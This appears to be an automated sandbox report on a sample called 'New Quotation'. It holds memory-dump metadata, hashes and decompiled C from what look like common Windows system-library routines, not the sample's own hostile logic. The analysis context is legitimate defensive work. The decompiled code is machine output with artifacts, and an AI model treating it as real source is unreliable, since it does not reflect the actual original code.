                                                                                                                                                                                          0x1d7fae0e
                                                                                                                                                                                          0x1d83e1da
                                                                                                                                                                                          0x1d83e1de
                                                                                                                                                                                          0x1d83e1df
                                                                                                                                                                                          0x1d83e1e0
                                                                                                                                                                                          0x1d83e1e2
                                                                                                                                                                                          0x1d83e1e3
                                                                                                                                                                                          0x1d83e1e4
                                                                                                                                                                                          0x1d83e1ed
                                                                                                                                                                                          0x1d83e1e6
                                                                                                                                                                                          0x1d83e1e6
                                                                                                                                                                                          0x1d83e1e6
                                                                                                                                                                                          0x1d83e1f2
                                                                                                                                                                                          0x1d83e1f4
                                                                                                                                                                                          0x1d83e1f6
                                                                                                                                                                                          0x1d7fae33
                                                                                                                                                                                          0x1d7fae36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e1fc
                                                                                                                                                                                          0x1d83e208
                                                                                                                                                                                          0x1d83e214
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e214
                                                                                                                                                                                          0x1d83e1f6
                                                                                                                                                                                          0x1d7fae17
                                                                                                                                                                                          0x1d7fae23
                                                                                                                                                                                          0x1d7fae2b
                                                                                                                                                                                          0x1d7fae2e
                                                                                                                                                                                          0x1d7fae2e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fae23
                                                                                                                                                                                          0x1d7faddd
                                                                                                                                                                                          0x1d7fade7
                                                                                                                                                                                          0x1d7fadec
                                                                                                                                                                                          0x1d7fadef
                                                                                                                                                                                          0x1d7fadf4
                                                                                                                                                                                          0x1d83e1b8
                                                                                                                                                                                          0x1d83e1bb
                                                                                                                                                                                          0x1d83e1cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e1cc
                                                                                                                                                                                          0x1d7fadfa
                                                                                                                                                                                          0x1d7fae00
                                                                                                                                                                                          0x1d7fae02
                                                                                                                                                                                          0x1d7fae04
                                                                                                                                                                                          0x1d83e194
                                                                                                                                                                                          0x1d83e197
                                                                                                                                                                                          0x1d83e1a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e1a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fae04
                                                                                                                                                                                          0x1d83e20f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e20f
                                                                                                                                                                                          0x1d7fad91
                                                                                                                                                                                          0x1d7fad94
                                                                                                                                                                                          0x1d7fad97
                                                                                                                                                                                          0x1d7fada0
                                                                                                                                                                                          0x1d7fada6
                                                                                                                                                                                          0x1d7fadb1
                                                                                                                                                                                          0x1d7fadb4
                                                                                                                                                                                          0x1d7fadba
                                                                                                                                                                                          0x1d7fadbd
                                                                                                                                                                                          0x1d7fadc4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fadc4
                                                                                                                                                                                          0x1d7fae62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fae62
                                                                                                                                                                                          0x1d7fad72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fad78
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fad78

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
                                                                                                                                                                                          • Instruction ID: c1b16d2b6a5c546b0ddac42122748c1965bef887dd9a9684c3b18417d894e472
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2510236A15A41EFC727AF14C841B2A7775FF40A75F16846DEA298B3A0C634ED01CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D89CDEB Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                          			E1D89CDEB(signed int* __ecx, signed int __edx, char _a4, intOrPtr _a8, signed char _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				void* __ebx;
				signed int _t62;
				signed int _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				void* _t77;
				char* _t81;
				signed int _t85;
				void* _t98;
				intOrPtr _t102;
				void* _t108;
				signed int _t111;
				signed int _t116;
				void* _t123;
				intOrPtr _t126;
				signed int _t129;
				char _t132;

				_t126 = _a8;
				_t132 = _a4;
				_t62 = 2;
				_v32 = _t62;
				_v36 = __edx;
				_v44 = __ecx;
				_v8 = _a12 >> 0x00000016 & _t62;
				asm("sbb eax, eax");
				_v12 = (__ecx[2] & 0) + 0x1ff;
				_t116 = __edx - ( *__ecx & __edx) >> 4 << __ecx[1];
				_v16 = _t116;
				if(_t126 <= 0) {
					_t98 = _t132 - _t126;
				} else {
					_v32 = _v32 & 0x00000000;
					_t98 = _t126 + _t132;
				}
				_t102 = 0;
				while(1) {
					_v20 = _t102;
					if(_t132 >= _t98) {
						break;
					}
					_t129 = _v12 - (_t132 + _t116 & _v12) + 1;
					_t72 = _t98 - _t132;
					if(_t129 >= _t72) {
						_t129 = _t72;
					}
					_a4 = _t132;
					_v40 = _t129;
					_t75 = E1D89D065(_v44, _v36,  &_a4,  &_v40, _v32);
					_v60 = _t75;
					if(_t75 == 0) {
						L23:
						_t132 = _t132 + _t129;
						_t116 = _v16;
						_t102 = _v20 + _t75;
						continue;
					}
					_t119 =  *_v44 & _v36;
					_v24 =  *_v44 & _v36;
					_v28 = _a4 + _v16;
					if(_t75 > 0) {
						_t108 = 0x1000;
						if((_a12 & 0x00000002) != 0) {
							_t108 = 0x40001000;
						}
					} else {
						_t108 = 0x4000;
					}
					_t77 = E1D89C0E6(_v44, _t119, _v28, _v40, _t75, _t108, _v8);
					if(_t77 < 0) {
						L28:
						return _t77;
					} else {
						_t78 = _v48;
						if(_v48 > 0) {
							E1D89D065(_v44, _v36,  &_a4,  &_v40, 1);
							_t78 = _v60;
						}
						E1D89DC08(_v44, _v36, _t78);
						if(E1D7E3C40() == 0) {
							_t81 = 0x7ffe0380;
						} else {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t81 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_t123 = (_v28 << 0xc) + _v24;
							_t111 = _v44[9];
							_t85 = _v40 << 0xc;
							if(_v48 <= 0) {
								E1D88F13E(_t98, _t111, _t123, _t85, 0xd);
							} else {
								E1D88EFD3(_t98, _t111, _t123, _t85, 0xa);
							}
						}
						_t75 = _v48;
						goto L23;
					}
				}
				_t76 = _a16;
				if(_t76 != 0) {
					 *_t76 = _t102;
				}
				_t77 = 0;
				goto L28;
			}
































                                                                                                                                                                                          0x1d89cdfc
                                                                                                                                                                                          0x1d89cdff
                                                                                                                                                                                          0x1d89ce07
                                                                                                                                                                                          0x1d89ce0a
                                                                                                                                                                                          0x1d89ce13
                                                                                                                                                                                          0x1d89ce19
                                                                                                                                                                                          0x1d89ce1d
                                                                                                                                                                                          0x1d89ce21
                                                                                                                                                                                          0x1d89ce2d
                                                                                                                                                                                          0x1d89ce3d
                                                                                                                                                                                          0x1d89ce3f
                                                                                                                                                                                          0x1d89ce45
                                                                                                                                                                                          0x1d89ce53
                                                                                                                                                                                          0x1d89ce47
                                                                                                                                                                                          0x1d89ce47
                                                                                                                                                                                          0x1d89ce4c
                                                                                                                                                                                          0x1d89ce4c
                                                                                                                                                                                          0x1d89ce55
                                                                                                                                                                                          0x1d89cf9a
                                                                                                                                                                                          0x1d89cf9a
                                                                                                                                                                                          0x1d89cfa0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89ce6b
                                                                                                                                                                                          0x1d89ce6c
                                                                                                                                                                                          0x1d89ce70
                                                                                                                                                                                          0x1d89ce72
                                                                                                                                                                                          0x1d89ce72
                                                                                                                                                                                          0x1d89ce88
                                                                                                                                                                                          0x1d89ce8c
                                                                                                                                                                                          0x1d89ce90
                                                                                                                                                                                          0x1d89ce95
                                                                                                                                                                                          0x1d89ce9b
                                                                                                                                                                                          0x1d89cf8e
                                                                                                                                                                                          0x1d89cf92
                                                                                                                                                                                          0x1d89cf94
                                                                                                                                                                                          0x1d89cf98
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89cf98
                                                                                                                                                                                          0x1d89ceaa
                                                                                                                                                                                          0x1d89ceb2
                                                                                                                                                                                          0x1d89ceb6
                                                                                                                                                                                          0x1d89cebc
                                                                                                                                                                                          0x1d89cec9
                                                                                                                                                                                          0x1d89cece
                                                                                                                                                                                          0x1d89ced0
                                                                                                                                                                                          0x1d89ced0
                                                                                                                                                                                          0x1d89cebe
                                                                                                                                                                                          0x1d89cebe
                                                                                                                                                                                          0x1d89cebe
                                                                                                                                                                                          0x1d89cee7
                                                                                                                                                                                          0x1d89ceee
                                                                                                                                                                                          0x1d89cfb1
                                                                                                                                                                                          0x1d89cfb7
                                                                                                                                                                                          0x1d89cef4
                                                                                                                                                                                          0x1d89cef4
                                                                                                                                                                                          0x1d89cefa
                                                                                                                                                                                          0x1d89cf0f
                                                                                                                                                                                          0x1d89cf14
                                                                                                                                                                                          0x1d89cf14
                                                                                                                                                                                          0x1d89cf21
                                                                                                                                                                                          0x1d89cf2d
                                                                                                                                                                                          0x1d89cf3f
                                                                                                                                                                                          0x1d89cf2f
                                                                                                                                                                                          0x1d89cf38
                                                                                                                                                                                          0x1d89cf38
                                                                                                                                                                                          0x1d89cf47
                                                                                                                                                                                          0x1d89cf63
                                                                                                                                                                                          0x1d89cf67
                                                                                                                                                                                          0x1d89cf6e
                                                                                                                                                                                          0x1d89cf76
                                                                                                                                                                                          0x1d89cf85
                                                                                                                                                                                          0x1d89cf78
                                                                                                                                                                                          0x1d89cf7b
                                                                                                                                                                                          0x1d89cf7b
                                                                                                                                                                                          0x1d89cf76
                                                                                                                                                                                          0x1d89cf8a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d89cf8a
                                                                                                                                                                                          0x1d89ceee
                                                                                                                                                                                          0x1d89cfa6
                                                                                                                                                                                          0x1d89cfab
                                                                                                                                                                                          0x1d89cfad
                                                                                                                                                                                          0x1d89cfad
                                                                                                                                                                                          0x1d89cfaf
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                                                                                                                          • Instruction ID: dd20b61487cf34fd1682df44e04ebb95229d0a525fd1fcaea10e8787f503c9f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED5188726083429FC709CF28C880B6ABBE5FFC8744F008A2DF99597294D775E945CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CEF79 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E1D7CEF79(intOrPtr* __ecx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v52;
				void* __ebx;
				signed char _t59;
				intOrPtr _t65;
				signed int _t67;
				void* _t75;
				signed char* _t78;
				intOrPtr _t79;
				signed int _t91;
				signed int _t104;
				void* _t118;
				intOrPtr* _t128;
				signed int _t135;
				void* _t137;

				_t137 = (_t135 & 0xfffffff8) - 0x14;
				_t128 = __ecx;
				_v20 = 0;
				E1D7D0FB0(__ecx, _t118, 0x1d8c68a0, E1D7D1260, 0, 0);
				if(E1D7CFEDD( &_v24) < 0 ||  *((intOrPtr*)(_t137 + 0x1c)) > 0xa) {
					_t59 = _v20;
				} else {
					_t59 = 3;
					_v20 = _t59;
				}
				_v20 = E1D7CFE40(_t128, _t59);
				_v28 = 0;
				_push(E1D7CF0E1(_t128, 1));
				_push(0x2000);
				_push( &_v20);
				_push(0);
				_push( &_v28);
				_push(0xffffffff);
				if(E1D812B10() < 0) {
					L16:
					_t65 = 0;
					goto L13;
				} else {
					if((_v20 & 0x00000001) != 0) {
						_t67 = 1;
					} else {
						_t67 =  *0x1d8c4360; // 0x10
					}
					_t104 = _t67 * 0x18;
					_t12 = _t104 + 0x7d0; // 0x7d1
					 *((intOrPtr*)(_t137 + 0x18)) = _t12;
					_push(E1D7CF0E1(_t128, 1));
					_push(0x1000);
					_push(_t137 + 0x20);
					_push(0);
					_push( &_v24);
					_push(0xffffffff);
					if(E1D812B10() < 0) {
						 *((intOrPtr*)(_t137 + 0x18)) = 0;
						E1D7CFABA( &_v24, _t137 + 0x18, 0x8000);
						goto L16;
					} else {
						_t75 = E1D7E3C40();
						_t133 = 0x7ffe0380;
						if(_t75 != 0) {
							_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t78 = 0x7ffe0380;
						}
						if( *_t78 != 0) {
							_t79 =  *[fs:0x30];
							__eflags =  *(_t79 + 0x240) & 0x00000001;
							if(( *(_t79 + 0x240) & 0x00000001) == 0) {
								goto L10;
							}
							__eflags = E1D7E3C40();
							if(__eflags != 0) {
								_t133 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							E1D88F1C3(_t104, _t128, _v24, __eflags,  *((intOrPtr*)(_t137 + 0x20)),  *(_t128 + 0x74) << 3,  *_t133 & 0x000000ff);
							E1D88EFD3(_t104, _t128, _v36, _v24, 9);
							goto L10;
						} else {
							L10:
							E1D7CFDB5(_t128, _v24, _v20);
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f4)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f4)) + _v20;
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f8)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f8)) +  *((intOrPtr*)(_t137 + 0x18));
							 *((intOrPtr*)(_v28 + 0x18)) = _v20 + _v28;
							 *((intOrPtr*)(_v28 + 0x14)) =  *((intOrPtr*)(_t137 + 0x18)) + _v28;
							_t35 = _v28 + 0x7d0; // 0x7d0
							 *((intOrPtr*)(_v28 + 0x10)) = _t35 + _t104;
							_t91 =  *0x1d8c6638; // 0x1
							if((_t91 & 0x00000003) == 0) {
								 *0x1d8c6638 = _t91 | 0x00000001;
								E1D7D22A6(_t114);
							}
							 *(_v24 + 0x1b8) = _v20;
							_t65 = _v24;
							L13:
							return _t65;
						}
					}
				}
			}
























                                                                                                                                                                                          0x1d7cef81
                                                                                                                                                                                          0x1d7cef89
                                                                                                                                                                                          0x1d7cef97
                                                                                                                                                                                          0x1d7cef9b
                                                                                                                                                                                          0x1d7cefab
                                                                                                                                                                                          0x1d7cefb8
                                                                                                                                                                                          0x1d82db85
                                                                                                                                                                                          0x1d82db87
                                                                                                                                                                                          0x1d82db88
                                                                                                                                                                                          0x1d82db88
                                                                                                                                                                                          0x1d7cefc6
                                                                                                                                                                                          0x1d7cefcb
                                                                                                                                                                                          0x1d7cefd4
                                                                                                                                                                                          0x1d7cefd5
                                                                                                                                                                                          0x1d7cefde
                                                                                                                                                                                          0x1d7cefdf
                                                                                                                                                                                          0x1d7cefe4
                                                                                                                                                                                          0x1d7cefe5
                                                                                                                                                                                          0x1d7cefee
                                                                                                                                                                                          0x1d82dba8
                                                                                                                                                                                          0x1d82dba8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ceff4
                                                                                                                                                                                          0x1d7ceff9
                                                                                                                                                                                          0x1d82dbb1
                                                                                                                                                                                          0x1d7cefff
                                                                                                                                                                                          0x1d7cefff
                                                                                                                                                                                          0x1d7cefff
                                                                                                                                                                                          0x1d7cf004
                                                                                                                                                                                          0x1d7cf00c
                                                                                                                                                                                          0x1d7cf012
                                                                                                                                                                                          0x1d7cf01b
                                                                                                                                                                                          0x1d7cf01c
                                                                                                                                                                                          0x1d7cf025
                                                                                                                                                                                          0x1d7cf026
                                                                                                                                                                                          0x1d7cf02b
                                                                                                                                                                                          0x1d7cf02c
                                                                                                                                                                                          0x1d7cf035
                                                                                                                                                                                          0x1d82db9a
                                                                                                                                                                                          0x1d82dba3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cf03b
                                                                                                                                                                                          0x1d7cf03b
                                                                                                                                                                                          0x1d7cf040
                                                                                                                                                                                          0x1d7cf047
                                                                                                                                                                                          0x1d82dbc0
                                                                                                                                                                                          0x1d7cf04d
                                                                                                                                                                                          0x1d7cf04d
                                                                                                                                                                                          0x1d7cf04d
                                                                                                                                                                                          0x1d7cf052
                                                                                                                                                                                          0x1d82dbca
                                                                                                                                                                                          0x1d82dbd0
                                                                                                                                                                                          0x1d82dbd7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82dbe2
                                                                                                                                                                                          0x1d82dbe4
                                                                                                                                                                                          0x1d82dbef
                                                                                                                                                                                          0x1d82dbef
                                                                                                                                                                                          0x1d82dbef
                                                                                                                                                                                          0x1d82dc0a
                                                                                                                                                                                          0x1d82dc1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cf058
                                                                                                                                                                                          0x1d7cf058
                                                                                                                                                                                          0x1d7cf062
                                                                                                                                                                                          0x1d7cf072
                                                                                                                                                                                          0x1d7cf083
                                                                                                                                                                                          0x1d7cf093
                                                                                                                                                                                          0x1d7cf0a0
                                                                                                                                                                                          0x1d7cf0a7
                                                                                                                                                                                          0x1d7cf0af
                                                                                                                                                                                          0x1d7cf0b2
                                                                                                                                                                                          0x1d7cf0b9
                                                                                                                                                                                          0x1d7cf0be
                                                                                                                                                                                          0x1d7cf0c3
                                                                                                                                                                                          0x1d7cf0c3
                                                                                                                                                                                          0x1d7cf0d0
                                                                                                                                                                                          0x1d7cf0d6
                                                                                                                                                                                          0x1d7cf0da
                                                                                                                                                                                          0x1d7cf0e0
                                                                                                                                                                                          0x1d7cf0e0
                                                                                                                                                                                          0x1d7cf052
                                                                                                                                                                                          0x1d7cf035

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1bf0283c3f45489de39214ed2cc05abe598b748fca0caa13151829e0dc254300
                                                                                                                                                                                          • Instruction ID: 2604201b39dd8acee03ddc6e0586c437d95ce51c6229a321920bd0af0f8e71a2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bf0283c3f45489de39214ed2cc05abe598b748fca0caa13151829e0dc254300
                                                                                                                                                                                          • Instruction Fuzzy Hash: 61516E766083429FC701CF18D884A6ABBE9FF88764F15492EF998C7291D730E945CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D3EE2 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E1D7D3EE2(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t101 = _t98 + 0xc8;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E1D7FAB30(E1D806010(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E1D7E3C40() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E1D8A50B7(_t102, _t98);
						}
						L1D7E2330(_t58, _v44);
						E1D7D79D1(_t102, _t98);
						E1D7D77F9(_t102, _v5);
						return E1D7E24D0(_v44);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1d8c67f0; // 0x0
							_v28 = _t67;
							_t68 =  *0x1d8c67f4; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1d8c67f0; // 0x0
						_t105 = _v28;
						_t80 =  *0x1d8c67f4; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t101 = _v40 + 0xc8;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}






































                                                                                                                                                                                          0x1d7d3ee2
                                                                                                                                                                                          0x1d7d3ee9
                                                                                                                                                                                          0x1d7d3eee
                                                                                                                                                                                          0x1d7d3ef0
                                                                                                                                                                                          0x1d7d3ef3
                                                                                                                                                                                          0x1d7d3ef7
                                                                                                                                                                                          0x1d7d3efa
                                                                                                                                                                                          0x1d7d3f0b
                                                                                                                                                                                          0x1d7d4049
                                                                                                                                                                                          0x1d7d4049
                                                                                                                                                                                          0x1d7d4049
                                                                                                                                                                                          0x1d7d3f0f
                                                                                                                                                                                          0x1d7d3f14
                                                                                                                                                                                          0x1d7d3f29
                                                                                                                                                                                          0x1d7d3f32
                                                                                                                                                                                          0x1d7d3f35
                                                                                                                                                                                          0x1d7d3f3d
                                                                                                                                                                                          0x1d7d4050
                                                                                                                                                                                          0x1d7d4057
                                                                                                                                                                                          0x1d7d4059
                                                                                                                                                                                          0x1d7d405c
                                                                                                                                                                                          0x1d7d405e
                                                                                                                                                                                          0x1d7d4060
                                                                                                                                                                                          0x1d7d4063
                                                                                                                                                                                          0x1d7d4065
                                                                                                                                                                                          0x1d7d4068
                                                                                                                                                                                          0x1d7d4068
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3f43
                                                                                                                                                                                          0x1d7d3f45
                                                                                                                                                                                          0x1d83002f
                                                                                                                                                                                          0x1d830034
                                                                                                                                                                                          0x1d830036
                                                                                                                                                                                          0x1d7d3fde
                                                                                                                                                                                          0x1d7d3fe0
                                                                                                                                                                                          0x1d7d3fe3
                                                                                                                                                                                          0x1d7d3fe5
                                                                                                                                                                                          0x1d7d3fe7
                                                                                                                                                                                          0x1d7d3fea
                                                                                                                                                                                          0x1d7d3fec
                                                                                                                                                                                          0x1d83003e
                                                                                                                                                                                          0x1d830041
                                                                                                                                                                                          0x1d830041
                                                                                                                                                                                          0x1d7d3ffd
                                                                                                                                                                                          0x1d7d3fff
                                                                                                                                                                                          0x1d7d4002
                                                                                                                                                                                          0x1d7d4009
                                                                                                                                                                                          0x1d830054
                                                                                                                                                                                          0x1d7d400f
                                                                                                                                                                                          0x1d7d400f
                                                                                                                                                                                          0x1d7d400f
                                                                                                                                                                                          0x1d7d4017
                                                                                                                                                                                          0x1d7d401a
                                                                                                                                                                                          0x1d830062
                                                                                                                                                                                          0x1d830062
                                                                                                                                                                                          0x1d7d4024
                                                                                                                                                                                          0x1d7d402d
                                                                                                                                                                                          0x1d7d4037
                                                                                                                                                                                          0x1d7d4046
                                                                                                                                                                                          0x1d7d4046
                                                                                                                                                                                          0x1d7d3f4b
                                                                                                                                                                                          0x1d7d3f50
                                                                                                                                                                                          0x1d7d3f50
                                                                                                                                                                                          0x1d7d3f55
                                                                                                                                                                                          0x1d7d3f55
                                                                                                                                                                                          0x1d7d3f5a
                                                                                                                                                                                          0x1d7d3f5d
                                                                                                                                                                                          0x1d7d3f62
                                                                                                                                                                                          0x1d7d3f6f
                                                                                                                                                                                          0x1d7d3f72
                                                                                                                                                                                          0x1d7d3f78
                                                                                                                                                                                          0x1d7d3f78
                                                                                                                                                                                          0x1d7d3f7a
                                                                                                                                                                                          0x1d7d3f80
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d4070
                                                                                                                                                                                          0x1d7d4070
                                                                                                                                                                                          0x1d7d3f86
                                                                                                                                                                                          0x1d7d3f86
                                                                                                                                                                                          0x1d7d3f89
                                                                                                                                                                                          0x1d7d3f90
                                                                                                                                                                                          0x1d7d3f96
                                                                                                                                                                                          0x1d7d3f9c
                                                                                                                                                                                          0x1d7d3fa1
                                                                                                                                                                                          0x1d7d3fa1
                                                                                                                                                                                          0x1d7d3faa
                                                                                                                                                                                          0x1d7d3faf
                                                                                                                                                                                          0x1d7d3fb2
                                                                                                                                                                                          0x1d7d3fb8
                                                                                                                                                                                          0x1d7d3fc6
                                                                                                                                                                                          0x1d7d3fc9
                                                                                                                                                                                          0x1d7d3fcc
                                                                                                                                                                                          0x1d7d3fce
                                                                                                                                                                                          0x1d7d3fd1
                                                                                                                                                                                          0x1d7d3fd3
                                                                                                                                                                                          0x1d7d3fd9
